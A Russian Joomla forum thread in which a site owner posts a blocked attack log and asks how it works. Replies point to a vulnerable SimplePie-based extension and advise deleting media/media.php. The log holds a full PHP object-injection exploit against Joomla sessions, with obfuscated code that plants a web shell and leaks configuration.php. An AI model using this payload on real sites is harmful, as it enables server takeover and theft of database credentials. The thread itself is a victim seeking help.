Новости Joomla

NorrCompetition 3.0 — новые возможности компонента конкурсов и голосований для Joomla 6

Релиз NorrCompetition 3.0 — крупное обновление расширения для проведения конкурсов и голосований в Joomla.

Вышли релизы безопасности Joomla 6.1.1 и Joomla 5.4.6

Релиз безопасности Joomla 6.1.1 и Joomla 5.4.6

Проект Joomla! рад сообщить о выходе Joomla 6.1.1 и Joomla 5.4.6. Это релизы безопасности и исправления ошибок для серий 5.x и 6.x.

👩‍💻 JoomShopping: Самый полный курс по созданию интернет-магазина на CMS Joomla.

👩‍💻 JoomShopping: Самый полный курс по созданию интернет-магазина на CMS Joomla.

В открытый доступ выложен видео-курс Дмитрия Гончарова по созданию интернет-магазина на связке Joomla + JoomShopping. Видеоуроки содержат пошаговые инструкции от регистрации хостинга до особенностей вёрстки, настройки способов оплаты и доставки.

В видео фигурирует JoomShopping 4 и Joomla 3, однако JoomShopping довольно консервативный компонент и многие способы и подходы в нём не менялись годами, поэтому данные видео могут быть по прежнему полезны.

Смотреть видео-курс

@joomlafeed

1   Вниз
0 Пользователей и 1 Гость просматривают эту тему.
  • 4 Ответов
  • 1399 Просмотров
*

1-F7

  • Захожу иногда
  • 197
  • 17 / 0
Заблокирована попытка инжекции сессии. И таких попыток было 20 за месяц с разных IP
« : 06.10.2016, 09:08:35 »
Объясните пожалуйста, как это мне на сайт пытаются залить сессию? Через что. Код отчета вот такой:

Код
}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:3351:"eval(chr(112).chr(114).chr(105).chr(110).chr(116).chr(32).chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).chr(100).chr(101).chr(99).chr(111).chr(100).chr(101).chr(40).chr(39).chr(97).chr(110).chr(86).chr(122).chr(90).chr(71).chr(112).chr(104).chr(99).chr(51).chr(86).chr(122).chr(89).chr(87).chr(112).chr(122).chr(89).chr(88).chr(86).chr(122).chr(89).chr(88).chr(85).chr(61).chr(39).chr(41).chr(59).chr(102).chr(105).chr(108).chr(101).chr(95).chr(112).chr(117).chr(116).chr(95).chr(99).chr(111).chr(110).chr(116).chr(101).chr(110).chr(116).chr(115).chr(40).chr(115).chr(116).chr(114).chr(95).chr(114).chr(101).chr(112).chr(108).chr(97).chr(99).chr(101).chr(40).chr(39).chr(105).chr(110).chr(100).chr(101).chr(120).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(39).chr(44).chr(36).chr(95).chr(83).chr(69).chr(82).chr(86).chr(69).chr(82).chr(91).chr(39).chr(83).chr(67).chr(82).chr(73).chr(80).chr(84).chr(95).chr(70).chr(73).chr(76).chr(69).chr(78).chr(65).chr(77).chr(69).chr(39).chr(93).chr(41).chr(46).chr(39).chr(109).chr(101).chr(100).chr(105).chr(97).chr(47).chr(109).chr(101).chr(100).chr(105).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(32).chr(44).chr(32).chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).chr(100).chr(101).chr(99).chr(111).chr(100).chr(101).chr(40).chr(39).chr(80).chr(68).chr(56).chr(103).chr(97).chr(87).chr(89).chr(111).chr(97).chr(88).chr(78).chr(122).chr(90).chr(88).chr(81).chr(111).chr(74).chr(70).chr(57).chr(72).chr(82).chr(86).chr(82).chr(98).chr(77).chr(86).chr(48).chr(112).chr(75).chr(88).chr(115).chr(107).chr(88).chr(122).chr(48).chr(107).chr(88).chr(48).chr(100).chr(70).chr(86).chr(68).chr(115).chr(107).chr(88).chr(49).chr(115).chr(120).chr(88).chr(83).chr(103).chr(107).chr(88).chr(49).chr(115).chr(121).chr(88).chr(83).chr(107).chr(55).chr(90).chr(88).chr(104).chr(112).chr(100).chr(68).chr(116).chr(57).chr(73).chr(68).chr(56).chr(43).chr(39).chr(41).chr(41).chr(59).chr(112).chr(114).chr(105).chr(110).chr(116).chr(32).chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).chr(101).chr(110).chr(99).chr(111).chr(100).chr(101).chr(40).chr(102).chr(105).chr(108).chr(101).chr(95).chr(103).chr(101).chr(116).chr(95).chr(99).chr(111).chr(110).chr(116).chr(101).chr(110).chr(116).chr(115).chr(40).chr(115).chr(116).chr(114).chr(95).chr(114).chr(101).chr(112).chr(108).chr(97).chr(99).chr(101).chr(40).chr(39).chr(105).chr(110).chr(100).chr(101).chr(120).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(99).chr(111).chr(110).chr(102).chr(105).chr(103).chr(117).chr(114).chr(97).chr(116).chr(105).chr(111).chr(110).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(36).chr(95).chr(83).chr(69).chr(82).chr(86).chr(69).chr(82).chr(91).chr(39).chr(83).chr(67).chr(82).chr(73).chr(80).chr(84).chr(95).chr(70).chr(73).chr(76).chr(69).chr(78).chr(65).chr(77).chr(69).chr(39).chr(93).chr(41).chr(41).chr(41).chr(59).chr(112).chr(114).chr(105).chr(110).chr(116).chr(32).chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).chr(100).chr(101).chr(99).chr(111).chr(100).chr(101).chr(40).chr(39).chr(97).chr(110).chr(86).chr(122).chr(90).chr(71).chr(112).chr(104).chr(99).chr(51).chr(86).chr(122).chr(89).chr(87).chr(112).chr(122).chr(89).chr(88).chr(86).chr(122).chr(89).chr(88).chr(85).chr(61).chr(39).chr(41).chr(59));JFactory::getConfig();exit";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}?, 77.87.110.131

Записан
*

1-F7

  • Захожу иногда
  • 197
  • 17 / 0
Re: Заблокирована попытка инжекции сессии. И таких попыток было 20 за месяц с разных IP
« Ответ #1 : 06.10.2016, 09:27:07 »
RsFairwall говорит, что нужно выключить обработчик сессии базу данных и за частых взломов сайтов на Joomla через сесию.

Наверное уже все пользователи знают, что Joomla можно взломать через сессию администратора и пытаются атаковать сайт. Когда они уже успокоятся, дыры же уже закрыты.
Записан
*

robert

  • Живу я здесь
  • 4974
  • 457 / 20
Re: Заблокирована попытка инжекции сессии. И таких попыток было 20 за месяц с разных IP
« Ответ #2 : 06.10.2016, 10:20:06 »
Это вы пытались зашифровать configuration.php и вообще остальные файлы? Ну заодно зашифруете и файлы дырявого расширения(й), через которые вам пытались залить вредоносный код.
При поверхностном просмотре кода могу сказать, что это расширение использует библиотеку SimplePie - скорее всего оно связано с лентой новостей.
Найдите media/media.php и удалите его. Но это только устранение симптомов, а не болезни. Нужно найти дыру и закрыть ее.
Что значит "залить сессию"? IMHO, ваша компетентность в этом вопросе недостаточна, обращайтесь к специалистам.
Записан
Не будь паразитом, сделай что-нибудь самостоятельно!
*

flyingspook

  • Живу я здесь
  • 3590
  • 247 / 9
Re: Заблокирована попытка инжекции сессии. И таких попыток было 20 за месяц с разных IP
« Ответ #3 : 06.10.2016, 18:34:13 »
@robert
не обращай внимание, ежегодно паранойя приходит ко многим и они начинают воздух сотрясать
Записан
*

Septdir

  • Живу я здесь
  • 3370
  • 168 / 4
Re: Заблокирована попытка инжекции сессии. И таких попыток было 20 за месяц с разных IP
« Ответ #4 : 11.10.2016, 01:00:39 »
Цитата: flyingspook от 06.10.2016, 18:34:13
@robert
не обращай внимание, ежегодно паранойя приходит ко многим и они начинают воздух сотрясать
сейчас не весна....
Записан
Не можете справиться с задачей сами пишите, решу ее за вас, не бесплатно*.
*Интересная задача, Деньги или Бартер. Натурой не беру!
CodersRank | Контакты | Мой GitHub | Workshop
1   Вверх
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Что было то?

Автор marksetter

 Ответов: 5
Просмотров: 1052 		Последний ответ 22.03.2022, 21:56:59
от sivers
Вывести материалы в разных позициях шаблона

Автор Alex_gs

 Ответов: 4
Просмотров: 1329 		Последний ответ 14.12.2021, 23:37:54
от anatol81n
Как вызвать одинаковый массив инструкцией $params->get() в разных модулях?

Автор user2008june

 Ответов: 6
Просмотров: 1146 		Последний ответ 13.12.2021, 19:52:39
от anatol81n
Как реализовать: вставка словосочетаний на разных страницах?

Автор AndreN

 Ответов: 4
Просмотров: 998 		Последний ответ 05.05.2021, 01:04:54
от gartes
Добавить дате +1 месяц

Автор lgmax

 Ответов: 2
Просмотров: 816 		Последний ответ 16.06.2020, 15:01:31
от lgmax